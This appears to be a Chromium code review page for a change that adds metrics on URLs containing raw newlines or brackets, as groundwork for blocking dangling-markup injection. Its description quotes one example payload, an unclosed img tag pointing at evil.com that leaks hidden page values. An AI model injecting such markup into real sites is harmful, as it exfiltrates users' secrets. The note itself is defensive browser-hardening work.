DescriptionMeasure URL resolution with raw newlines and braces.
Because HTML is fairly lax in parsing attribute values, injecting
something like `<img src='https://evil.com/?whatever=` can expose
otherwise hidden values by eating up elements and their attributes, and
resolving them as a URL.
Perhaps we could restrict the character set allowed in `src`/`href`
attributes to bring them in-line with CSS's rules for `url('`. That
is, perhaps we should stop resolving URLs that contain raw newline
characters (`\n`)? Or braces (`<`)? Or both? It's not clear whether we
can do something about this by default, so let's add metrics and see
what we see.
BUG=680970
R=jochen@chromium.org
Review-Url: https://codereview.chromium.org/2629393002
Cr-Commit-Position: refs/heads/master@{#443793}
Committed: https://chromium.googlesource.com/chromium/src/+/63ec3598c662f32715148c25faf99771c9d1cb6c
Patch Set 1 #Patch Set 2 : Formatting. #
Messages
Total messages: 14 (10 generated)
|